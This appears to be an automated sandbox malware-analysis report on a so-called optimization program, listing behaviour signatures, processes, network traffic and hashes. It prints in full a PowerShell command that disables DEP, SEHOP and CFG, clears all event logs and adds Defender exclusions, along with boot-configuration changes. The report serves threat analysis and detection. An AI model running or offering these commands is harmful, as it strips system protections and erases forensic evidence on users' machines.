Analysis Overview
SHA256
33f69f407d8ff31e83719e621aa3fdd5c5d6313dd26b7aab25ce6f631bdcbdef
Threat Level: Likely malicious
The file ET_Optimization_Program.exe was found to be: Likely malicious.
Malicious Activity Summary
Modifies boot configuration data using bcdedit
Command and Scripting Interpreter: PowerShell
Enumerates physical storage devices
Unsigned PE
Suspicious behavior: EnumeratesProcesses
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
Modifies data under HKEY_USERS
Suspicious use of AdjustPrivilegeToken
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-06-11 03:01
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-06-11 03:01
Reported
2024-06-11 03:04
Platform
win11-20240426-en
Max time kernel
115s
Max time network
116s
Command Line
Signatures
Modifies boot configuration data using bcdedit
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\System32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\System32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\System32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\System32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\System32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\System32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\System32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\System32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\System32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\System32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\System32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\System32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\System32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\System32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\System32\bcdedit.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Enumerates physical storage devices
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Set value (data) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentPalette = 99ebff004cc2ff000091f8000078d4000067c000003e9200001a6800f7630c00 | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History\AutoColor = "0" | C:\Windows\system32\LogonUI.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\AccentColor = "4292114432" | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglow = "3288365268" | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationBlurBalance = "1" | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\StartColorMenu = "4290799360" | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColorBalance = "89" | C:\Windows\system32\LogonUI.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent | C:\Windows\system32\LogonUI.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentColorMenu = "4292114432" | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColor = "3288365268" | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglowBalance = "10" | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\EnableWindowColorization = "54" | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationGlassAttribute = "1" | C:\Windows\system32\LogonUI.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\LogonUI.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\ET_Optimization_Program.exe
"C:\Users\Admin\AppData\Local\Temp\ET_Optimization_Program.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-ProcessMitigation -System -Disable DEP, SEHOP, AuditSEHOP, SEHOPTelemetry, CFG; Remove-Item -Path \'HKLM:\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\*\' -Recurse -ErrorAction SilentlyContinue; Get-EventLog -LogName * | ForEach { Clear-EventLog $_.Log }; Add-MpPreference -ExclusionPath $env:windir'\SoftwareDistribution\Datastore\Datastore.edb'; Add-MpPreference -ExclusionPath $env:windir'\SoftwareDistribution\Datastore\Logs\Edb *.jrs'; Add-MpPreference -ExclusionPath $env:windir'\SoftwareDistribution\Datastore\Logs\Edb.chk'; Add-MpPreference -ExclusionPath $env:windir'\SoftwareDistribution\Datastore\Logs\Tmp.edb'; Add-MpPreference -ExclusionPath $env:windir'\SoftwareDistribution\Datastore\Logs\*.log'; Add-MpPreference -ExclusionPath $env:windir'\Security\Database\*.edb'; Add-MpPreference -ExclusionPath $env:windir'\Security\Database\*.sdb'; Add-MpPreference -ExclusionPath $env:windir'\SoftwareDistribution\Datastore\Datastore.edb'; Add-MpPreference -ExclusionPath $env:windir'\Security\Database\*.log'; Add-MpPreference -ExclusionPath $env:windir'\Security\Database\*.chk'; Add-MpPreference -ExclusionPath $env:windir'\Security\Database\*.jrs'; Add-MpPreference -ExclusionPath $env:windir'\Security\Database\*.xml'; Add-MpPreference -ExclusionPath $env:windir'\Security\Database\*.csv'; Add-MpPreference -ExclusionPath $env:windir'\Security\Database\*.cmtx'; Add-MpPreference -ExclusionPath $env:windir'\apppatch\sysmain.sdb'; Add-MpPreference -ExclusionPath $env:windir'\EventLog\Data\lastalive?.dat'; Add-MpPreference -ExclusionPath $env:SystemRoot'\System32\GroupPolicy\Machine\Registry.pol'; Add-MpPreference -ExclusionPath $env:SystemRoot'\System32\GroupPolicy\Machine\Registry.tmp'; Add-MpPreference -ExclusionPath $env:SystemRoot'\System32\sru\*.log'; Add-MpPreference -ExclusionPath $env:SystemRoot'\System32\sru\*.dat'; Add-MpPreference -ExclusionPath $env:SystemRoot'\System32\sru\*.chk'; Add-MpPreference -ExclusionPath $env:SystemRoot'\System32\Configuration\MetaConfig.mof'; Add-MpPreference -ExclusionPath $env:SystemRoot'\System32\winevt\Logs\*.evtx'; Add-MpPreference -ExclusionPath $env:SystemRoot'\System32\Configuration\DSCStatusHistory.mof'; Add-MpPreference -ExclusionPath $env:SystemRoot'\System32\Configuration\DSCEngineCache.mof'; Add-MpPreference -ExclusionPath $env:SystemRoot'\System32\Configuration\DSCResourceStateCache.mof'; Add-MpPreference -ExclusionPath $env:SystemRoot'\System32\Configuration\ConfigurationStatus'; Add-MpPreference -ExclusionPath $env:userprofile'\AppData\Local\ETOptProgram\ETOptProgram.xml'
C:\Windows\System32\bcdedit.exe
"C:\Windows\System32\bcdedit.exe" /set useplatformtick yes
C:\Windows\System32\bcdedit.exe
"C:\Windows\System32\bcdedit.exe" /deletevalue linearaddress57
C:\Windows\System32\bcdedit.exe
"C:\Windows\System32\bcdedit.exe" /deletevalue increaseuserva
C:\Windows\System32\bcdedit.exe
"C:\Windows\System32\bcdedit.exe" /deletevalue firstmegabytepolicy
C:\Windows\System32\bcdedit.exe
"C:\Windows\System32\bcdedit.exe" /deletevalue avoidlowmemory
C:\Windows\System32\bcdedit.exe
"C:\Windows\System32\bcdedit.exe" /deletevalue nolowmem
C:\Windows\System32\bcdedit.exe
"C:\Windows\System32\bcdedit.exe" /deletevalue allowedinmemorysettings
C:\Windows\System32\bcdedit.exe
"C:\Windows\System32\bcdedit.exe" /deletevalue x2apicpolicy
C:\Windows\System32\bcdedit.exe
"C:\Windows\System32\bcdedit.exe" /deletevalue configaccesspolicy
C:\Windows\System32\bcdedit.exe
"C:\Windows\System32\bcdedit.exe" /deletevalue MSI Default
C:\Windows\System32\bcdedit.exe
"C:\Windows\System32\bcdedit.exe" /deletevalue usephysicaldestination
C:\Windows\System32\bcdedit.exe
"C:\Windows\System32\bcdedit.exe" /deletevalue usefirmwarepcisettings
C:\Windows\System32\bcdedit.exe
"C:\Windows\System32\bcdedit.exe" /deletevalue useplatformclock
C:\Windows\System32\bcdedit.exe
"C:\Windows\System32\bcdedit.exe" /deletevalue disabledynamictick
C:\Windows\System32\bcdedit.exe
"C:\Windows\System32\bcdedit.exe" /deletevalue vsmlaunchtype
C:\Windows\System32\bcdedit.exe
"C:\Windows\System32\bcdedit.exe" /deletevalue vm
C:\Windows\system32\LogonUI.exe
"LogonUI.exe" /flags:0x4 /state0:0xa3a1a855 /state1:0x41c64e6d
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | browser.pipe.aria.microsoft.com | udp |
| GB | 88.221.135.35:443 | tcp | |
| IE | 20.50.80.213:443 | browser.pipe.aria.microsoft.com | tcp |
| US | 8.8.8.8:53 | 213.80.50.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 48.110.63.41.in-addr.arpa | udp |
| BE | 88.221.83.187:443 | r.bing.com | tcp |
| BE | 88.221.83.187:443 | r.bing.com | tcp |
| BE | 88.221.83.187:443 | r.bing.com | tcp |
| BE | 88.221.83.187:443 | r.bing.com | tcp |
| BE | 88.221.83.187:443 | r.bing.com | tcp |
| BE | 88.221.83.187:443 | r.bing.com | tcp |
| N/A | 20.42.73.25:443 | tcp |
Files
memory/4752-0-0x0000015291940000-0x000001529197A000-memory.dmp
memory/4752-1-0x00007FFB029C3000-0x00007FFB029C5000-memory.dmp
memory/4752-2-0x00007FFB029C0000-0x00007FFB03482000-memory.dmp
memory/4752-6-0x00007FFB029C0000-0x00007FFB03482000-memory.dmp
memory/4752-7-0x00007FFB029C0000-0x00007FFB03482000-memory.dmp
memory/4752-8-0x00007FFB029C0000-0x00007FFB03482000-memory.dmp
memory/3576-11-0x00007FFB029C0000-0x00007FFB03482000-memory.dmp
memory/3576-12-0x00007FFB029C0000-0x00007FFB03482000-memory.dmp
memory/3576-18-0x0000021BF3F70000-0x0000021BF3F92000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_l1ebbaqa.xnc.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/3576-22-0x00007FFB029C0000-0x00007FFB03482000-memory.dmp
memory/4752-23-0x00007FFB029C0000-0x00007FFB03482000-memory.dmp
memory/3576-27-0x0000021BF4040000-0x0000021BF405E000-memory.dmp
memory/3576-30-0x00007FFB029C0000-0x00007FFB03482000-memory.dmp
memory/4752-31-0x00007FFB029C0000-0x00007FFB03482000-memory.dmp
memory/4752-32-0x00007FFB029C0000-0x00007FFB03482000-memory.dmp
memory/4752-36-0x00007FFB029C0000-0x00007FFB03482000-memory.dmp